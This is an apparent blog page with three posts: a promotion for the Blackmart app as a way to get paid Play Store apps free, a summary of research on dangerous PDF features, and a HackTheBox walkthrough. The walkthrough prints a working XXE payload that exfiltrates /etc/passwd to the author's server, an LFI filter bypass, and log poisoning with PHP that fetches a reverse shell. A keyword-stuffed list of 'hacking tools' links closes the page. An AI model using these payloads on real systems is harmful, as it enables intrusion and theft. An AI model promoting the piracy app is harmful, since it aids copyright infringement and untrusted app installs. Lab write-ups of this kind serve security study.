Wednesday, May 31, 2023

DOWNLOAD BLACKMART ANDROID APP – DOWNLOAD PLAYSTORE PAID APPS FREE

Android made endless possibilities for everyone. It introduced a platform where are millions of apps that a user can download and buy depending on their needs. You're thinking about Google PlayStore, yes I am also talking about Google PlayStore. It's categorized app collection depending on every niche of life. Few of them are free and some of them are paid. Most of the paid apps are only charges small cost in between $2 to $8, but few apps are highly costly that make cost over $50 even, which is not possible for every user to buy and get benefit from it. So, here I am sharing a really useful app, that can make every Google PlayStore app for you to download it for free. You can download any paid app that may even cost about $50. It's totally free. Download blackmart Android app and download google play store paid apps freely.

DOWNLOAD BLACKMART ANDROID APP – DOWNLOAD PLAYSTORE PAID APPS FREE

  • It's extremely easy to use.
  • It has a Multilingual option for a global user experience.
  • The app doesn't ask for any payments.
  • Capable to download full of downloadable applications.
  • Super fast in downloading and installation.

More info


Posted by sOuLineage at 5/31/2023 08:21:00 PM
0 comments

Insecure Features In PDFs

In 2019, we published attacks on PDF Signatures and PDF Encryption. During our research and studying the related work, we discovered a lot of blog posts, talks, and papers focusing on malicious PDFs causing some damage. However, there was no systematic analysis of all possible dangerous features supported by PDFs, but only isolated exploits and attack concepts.

We decided to fill this gap and systematize the possibilities to use legitimate PDF features and do bad stuff. We define four attack categories: Denial of Service, Information Disclosure, Data Manipulation, and Code Execution.

Our evaluation reveals 26 of 28 popular PDF processing applications are vulnerable to at least one attack. You can download all malicious PDFs here. You can also find more technical details in our NDSS'21 paper.

This is a joined work of Jens Müller, Dominik Noss, Christian Mainka, Vladislav Mladenov, and Jörg Schwenk.

Dangerous Paths: Overview

To identify attack vectors, we systematically surveyed which potentially dangerous features exist in the PDF specification. We created a comprehensive list with all PDF Actions that can be called. This list contains 18 different actions that we carefully studied.
 
 
We selected eight actions – the ones that directly or indirectly allow access to a file handle and may therefore be abused for dangerous features such as URL invocation or writing to files. Having a list of security-sensitive actions, we proceeded by investigating all objects and related events that can trigger these actions.

We identified four PDF objects which allow calling arbitrary actions (Page, Annotation, Field, and Catalog). Most objects offer multiple alternatives for this purpose. For example, the Catalog object, defines the OpenAction or additional actions (AA) events. Each event can launch any sequence of PDF actions, for example, Launch, Thread, etc. JavaScript actions can be embedded within documents. It  opens a new area for attacks, for example, new annotations can be created that can have actions which once again lead to accessing file handles.

Denial of Service

The goal of the denial of service class of attacks is enforcing to process PDF applications in consuming all available resources (i.e., computing time or memory) or causes them to crash by opening a specially crafted PDF document. We identified two variants: Infinite Loop and Deflate Bomb.

Infinite Loop

This variant induces an endless loop causing the program execution to get stuck. The PDF standard allows various elements of the document structure to reference to themselves, or to other elements of the same type.

  • Action loop: PDF actions allow to specify a Next action to be performed, thereby resulting in "action cycles".
  • ObjStm loop: Object streams may extend other object streams allows the crafting of a document with cycles.
  • Outline loop: PDF documents may contain an outline. Its entries, however, can refer to themselves or each other.
  • Calculations: PDF defines "Type 4" calculator functions, for example, to transform colors. Processing hard-to-solve mathematical formulas may lead to high demands of CPU.
  • JavaScript: Finally, in case the PDF application processes scripts within documents, infinite loops can be induced.

Deflate Bomb

Data amplification attacks based on malicious zip archives are well-known. The first publicly documented DoS attack using a "zip bomb" was conducted in 1996 against a Fidonet BBS administrator. However, not only zip files but also stream objects within PDF documents can be compressed using various algorithms such as Deflate to reduce the overall file size. 

Information Disclosure

The goal of this class of attacks is to track the usage of a document by silently invoking a connection to the attacker's server once the file is opened, or to leak PDF document form data, local files, or NTLM credentials to the attacker.

URL Invocation

PDF documents that silently "phone home" should be considered as privacy-invasive. They can be used, for example, to deanonymize reviewers, journalists, or activists behind a shared mailbox. The attack's goal is to open a backchannel to an attacker-controlled server once the PDF file is opened by the victim.

The possibility of malicious URI resolving in PDF documents has been introduced by Hamon [1] who gave an evaluation for URI and SubmitForm actions in Acrobat Reader. We extend their analysis to all standard PDF features that allow opening a URL, such as ImportData, Launch, GoToR, and JavaScript.

Form Data Leakage

Documents can contain forms to be filled out by the user – a feature introduced with PDF version 1.2 in 1996 and used on a daily basis for routine offices tasks, such as travel authorization or vacation requests. The idea of this attack is as follows: The victim downloads a form – a PDF document which contains form fields – from an attacker controlled source and fills it out on the screen, for example, in order to print it. The form is manipulated by the attacker in such a way that it silently send input data to the attacker's server.

Local File Leakage

The PDF standard defines various methods to embed external files into a document or otherwise access files on the host's file system, as documented below.

  • External streams: Documents can contain stream objects (e.g., images) to be included from external files on disk.
  • Reference XObjects: This feature allows a document to import content from another (external) PDF document.
  • Open Prepress Interface: Before printing a document, local files can be defined as low-resolution placeholders.
  • Forms Data Format (FDF): Interactive form data can be stored in, and auto-imported from, external FDF files.
  • JavaScript functions: The Adobe JavaScript reference enables documents to read data from or import local files.

If a malicious document managed to firstly read files from the victim's disk and secondly, send them back to the attacker, such behavior would arguably be critical.

Credential Theft

In 1997, Aaron Spangler posted a vulnerability in Windows NT on the Bugtraq mailing list [2]: Any client program can trigger a connection to a rogue SMB server. If the server requests authentication, Windows will automatically try to log in with a hash of the user's credentials. Such captured NTLM hashes allow for efficient offline cracking and can be re-used by applying pass-the-hash or relay attacks to authenticate under the user's identity. In April 2018, Check Point Research [3] showed that similar attacks can be performed with malicious PDF files. They found that the target of GoToR and GoToE actions can be set to \\attacker.com\dummyfile, thereby leaking credentials in the form of NTLM hashes.

Data Manipulation

This attack class deals with the capabilities of malicious documents to silently modify form data, to write to local files on the host's file system, or to show a different content based on the application that is used to open the document.

Form Modification

The idea of this attack is as follows: Similar to Form Data Leakage attacks, the victim obtains a harmlessly looking PDF document from an attacker controlled source, for example, a remittance slip or a tax form. The goal of the attacker is to dynamically, and without knowledge of the victim, manipulate form field data.

File Write Access

The PDF standard enables documents to submit form data to external webservers. Technically the webserver's URL is defined using a PDF File Specification. This ambiguity in the standard may be interpreted by implementations in such a way that they enable documents to submit PDF form data to a local file, thereby writing to this file.
 

Content Masking 

The goal of this attack is to craft a document that renders differently, depending on the applied PDF interpreter. This can be used, for example, to show different content to different reviewers, to trick content filters (AI-based machines as well as human content moderators), plagiarism detection software, or search engines, which index a different text than the one shown to users when opening the document.

  • Stream confusion: It is unclear how content streams are parsed if their Length value does not match the offset of the endstream marker, or if syntax errors are introduced.
  • Object confusion: An object can overlay another object. The second object may not be processed if it has a duplicate object number, if it is not listed in the XRef table, or if other structural syntax errors are introduced.
  • Document confusion: A PDF file can contain yet another document (e.g., as embedded file), multiple XRef tables, etc., which results in ambiguities on the structural level.
  • PDF confusion: Objects before the PDF header or after an EOF marker may be processed by implementations, introducing ambiguities in the outer document structure.

Code Execution

The goal of this attack is to execute attacker-controlled code. This can be achieved by silently launching an executable file, embedded within the document, to infect the host with malware. The PDF specification defines the Launch action, which allows documents to launch arbitrary applications. The file to be launched can either be specified by a local path, a network share, a URL, or a file embedded within the PDF document itself.

Evaluation

Out of 28 tested applications, 26 are vulnerable to at least one attack.

Authors of this Post

Dominik Noss
Christian Mainka

Sources

1] V. Hamon. "Malicious URI resolving in PDF documents". In: Journal of Computer Virology and Hacking Techniques 9.2 (2013), pp. 65–76.

[2] Aaron Spangler. WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4). https://insecure.org/sploits/winnt.automatic.authentication.html. Mar. 1997.

[3] Check Point Research. NTLM Credentials Theft via PDF Files. https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/. 2018.



More info


Posted by sOuLineage at 5/31/2023 11:53:00 AM
0 comments

XXE In Docx Files And LFI To RCE


In this article we are going to talk about XXE injection and we will also look at LFI in a little more advanced perspective. I will be performing both of these attacks on a HackTheBox machine called Patents which was a really hard machine. I am not going to show you how to solve the Patents machine rather I will show you how to perform the above mentioned attacks on the box.

XML External Entity Attack

Lets start with what an XXE injection means. OWASP has put XXE on number 4 of OWASP Top Ten 2017 and describes XXE in the following words: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts."
What that means is if you have an XML parser which is not properly configured to parse the input data you may end you getting yourself screwed. On the Patents box there is an upload form which lets us upload a word document (docx) and then parses it to convert it into a pdf document. You may be thinking but where is the XML document involved here. Well it turns out that the docx files are made up of multiple XML documents archived together. Read more about it in the article OpenXML in word processing – Custom XML part – mapping flat data. It turns out that the docx2pdf parser of the Patents machine is poorly configured to allow XXE injection attacks but to perform that attack we need to inject out XXE payload in the docx file. First lets upload a simple docx file to the server and see what happens.

After uploading the file we get a Download option to download the pdf file that was created from our docx file.

As can be seen, the functionality works as expected.

Now lets exploit it. What we have to do is that we have to inject our XXE payload in the docx file so that the poorly configured XML parser on the server parses our payload and allows us to exfil data from the server. To do that we will perform these steps.
  1. Extract the docx file.
  2. Embed our payload in the extracted files.
  3. Archive the file back in the docx format.
  4. Upload the file on the server.
To extract the docx file we will use the unzip Linux command line tool.
mkdir doc cd doc unzip ../sample.docx
Following the article mentioned above we see that we can embed custom XML to the docx file by creating a directory (folder) called customXml inside the extracted folder and add an item1.xml file which will contain our payload.
mkdir customXml cd customXml vim item1.xml
Lets grab an XXE payload from PayloadsAllTheThings GitHub repo and modify it a bit which looks like this:
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://10.10.14.56:8090/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r>
Notice the IP address in the middle of the payload, this IP address points to my python server which I'm going to host on my machine shortly on port 8090. The contents of the dtd.xml file that is being accessed by the payload is:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.56:8090/dtd.xml?%data;'>">
What this xml file is doing is that it is requesting the /etc/passwd file on the local server of the XML parser and then encoding the contents of /etc/passwd into base64 format (the encoding is done because that contents of the /etc/passwd file could be something that can break the request). Now lets zip the un-archived files back to the docx file using the zip linux command line tool.
zip -r sample.docx *
here -r means recursive and * means all files sample.docx is the output file.
Lets summarize the attack a bit before performing it. We created a docx file with an XXE payload, the payload will ping back to our server looking for a file named dtd.xml. dtd.xml file will be parsed by the XML parser on the server in the context of the server. Grabbing the /etc/passwd file from the server encoding it using base64 and then sends that base64 encoded data back to us in the request.
Now lets fire-up our simple http python server in the same directory we kept our dtd.xml file:
python -m SimpleHTTPServer 8090
and then upload the file to the server and see if it works.
We got a hit on our python server from the target server looking for the dtd.xml file and we can see a 200 OK besides the request.
Below the request for dtd.xml we can see another request which was made by the target server to our server and appended to the end of this request is the base64 encoded data. We grab everything coming after the ? of the request and copy it to a file say passwd.b64 and after that we use the base64 linux command line tool to decode the base64 data like this:
cat passwd.64 | base64 -d > passwd
looking at the contents of passwd file we can confirm that it is indeed the /etc/passwd file from the target server. Now we can exfiltrate other files as well from the server but remember we can only exfiltrate those files from the server to which the user running the web application has read permissions. To extract other files we simple have to change the dtd.xml file, we don't need to change our docx file. Change the dtd.xml file and then upload the sample.docx file to the server and get the contents of another file.

LFI to RCE

Now getting to the part two of the article which is LFI to RCE, the box is also vulnerable to LFI injection you can read about simple LFI in one of my previous article Learning Web Pentesting With DVWA Part 6: File Inclusion, in this article we are going a bit more advanced. The URL that is vulnerable to LFI on the machine is:
http://10.10.10.173/getPatent_alphav1.0.php

We can use the id parameter to view the uploaded patents like this:
http://10.10.10.173/getPatent_alphav1.0.php?id=1

The patents are basically local document files on the server, lets try to see if we can read other local files on the server using the id parameter. We try our LFI payloads and it doesn't seem to work.

Maybe its using a mechanism to prevent LFI attacks. After reading the source for getPatent_alphav1.0.php from previous vulnerability we can see it is flagging ../ in the request. To bypass that restriction we will use ..././, first two dots and the slash will be removed from ..././ and what will be left is ../, lets try it out:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././etc/passwd

Wohoo! we got it but now what? To get an RCE we will check if we can access the apache access log file
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log
As we can see we are able to access the apache access log file lets try to get an RCE via access logs. How this works is basically simple, the access.log file logs all the access requests to the apache server. We will include php code in our request to the server, this malicious request will be logged in the access.log file. Then using the LFI we will access the access.log file. As we access the access.log file via the LFI, the php code in our request will be executed and we will have an RCE. First lets grab a php reverse shell from pentest monkey's GitHub repo, modify the ip and port variables  to our own ip and port, and put it into the directory which our python server is hosting. I have renamed the file to shell.php for simplicity here.
Lets setup our reverse shell listener:
nc -lvnp 9999
and then perfrom a request to the target server with our php code like this:
curl "http://10.10.10.173/<?php system('curl\$\{IFS\}http://10.10.14.56:8090/shell.php');?>"
and lastly lets access the apache access.log file via the LFI on the target server:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log3
Boom! we have a shell.

That's it for today's article see you next time.

References

Related news

  1. Hacking Tools For Games
  2. Hacking Apps
  3. Pentest Tools Nmap
  4. Growth Hacker Tools
  5. Hack Tools
  6. Pentest Tools Port Scanner
  7. Hacker Tools Apk
  8. Pentest Tools For Windows
  9. Pentest Tools Bluekeep
  10. Hacks And Tools
  11. How To Hack
  12. Pentest Tools Android
  13. Hacking Tools Usb
  14. Easy Hack Tools
  15. Hacker Tools For Pc
  16. Hacker Hardware Tools
  17. Pentest Tools Free
  18. Pentest Tools Download
  19. How To Hack
  20. Hacking Tools And Software
  21. What Are Hacking Tools
  22. Nsa Hack Tools Download
  23. Hacker Tools Online
  24. Hack App
  25. Pentest Tools For Windows
  26. Nsa Hacker Tools
  27. Hacking Tools Mac
  28. Hacker Tools Windows
  29. Free Pentest Tools For Windows
  30. Hacker Tools Software
  31. Pentest Tools Review
  32. Pentest Tools Alternative
  33. Hacking Tools Github
  34. Hacking Tools Github
  35. Hacker Security Tools
  36. Nsa Hack Tools Download
  37. Hack Tools
  38. Hacking Tools And Software
  39. How To Hack
  40. Hacker Tool Kit
  41. Hackrf Tools
  42. Best Hacking Tools 2020
  43. Hacker Security Tools
  44. Best Pentesting Tools 2018
  45. Hacking Tools Pc
  46. Pentest Tools Linux
  47. Growth Hacker Tools
  48. Beginner Hacker Tools
  49. Hacking Tools Mac
  50. Hack Apps
  51. Pentest Tools Apk
  52. Hacking Tools Online
  53. Hack Tools Download
  54. What Is Hacking Tools
  55. Hacker Tools Windows
  56. Pentest Tools For Android
  57. Pentest Tools Download
  58. Hacker Tools Windows
  59. Hacker Tools 2019
  60. Hackers Toolbox
  61. Hack Tool Apk
  62. Free Pentest Tools For Windows
  63. Hacking Tools Download
  64. Pentest Tools Kali Linux
  65. Hacker Tools Apk
  66. Hacking Tools 2019
  67. Ethical Hacker Tools
  68. Hacker
  69. Best Pentesting Tools 2018
  70. Pentest Tools Tcp Port Scanner
  71. Best Hacking Tools 2020
  72. Hack Tools For Mac
Posted by sOuLineage at 5/31/2023 03:08:00 AM
0 comments
Subscribe to: Posts (Atom)